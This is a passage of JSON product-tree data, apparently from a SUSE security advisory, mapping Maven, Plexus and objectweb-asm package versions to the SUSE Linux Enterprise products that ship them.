"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch as component of SUSE Linux Enterprise Module for Development Tools 15 SP5",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-archiver-3.6.1-150200.3.7.3.noarch"
},
"product_reference": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch as component of SUSE Linux Enterprise Module for Development Tools 15 SP5",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch"
},
"product_reference": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch as component of SUSE Linux Enterprise Module for Development Tools 15 SP5",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch as component of SUSE Linux Enterprise Module for Development Tools 15 SP5",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch as component of SUSE Linux Enterprise Module for Development Tools 15 SP5",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP5:plexus-archiver-4.8.0-150200.3.7.2.noarch"
},
"product_reference": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch as component of SUSE Linux Enterprise Module for Development Tools 15 SP5",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP5:plexus-compiler-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch"
},
"product_reference": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch"
},
"product_reference": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch"
},
"product_reference": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch"
},
"product_reference": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch"
},
"product_reference": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch"
},
"product_reference": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-archiver-3.6.1-150200.3.7.3.noarch"
},
"product_reference": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch"
},
"product_reference": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:plexus-archiver-4.8.0-150200.3.7.2.noarch"
},
"product_reference": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:plexus-compiler-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch"
},
"product_reference": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch"
},
"product_reference": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch"
},
"product_reference": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP2-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch"
},
"product_reference": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP2-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP2-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch"
},
"product_reference": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP2-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch as component of SUSE Linux Enterprise Server 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP2-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP2-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP2-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP2-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Linux Enterprise Server 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP2-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP2-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch as component of SUSE Linux Enterprise Server 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP2-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch"
},
"product_reference": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP2-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch as component of SUSE Linux Enterprise Server 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP2-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP2-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch"
},
"product_reference": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch"
},
"product_reference": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch"
},
"product_reference": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch"
},
"product_reference": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch"
},
"product_reference": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch"
},
"product_reference": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP2",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-archiver-3.6.1-150200.3.7.3.noarch"
},
"product_reference": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP2",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch"
},
"product_reference": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP2",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP2",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP2",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP2:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP2",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP2:plexus-archiver-4.8.0-150200.3.7.2.noarch"
},
"product_reference": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP2",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP2:plexus-compiler-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-archiver-3.6.1-150200.3.7.3.noarch"
},
"product_reference": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch"
},
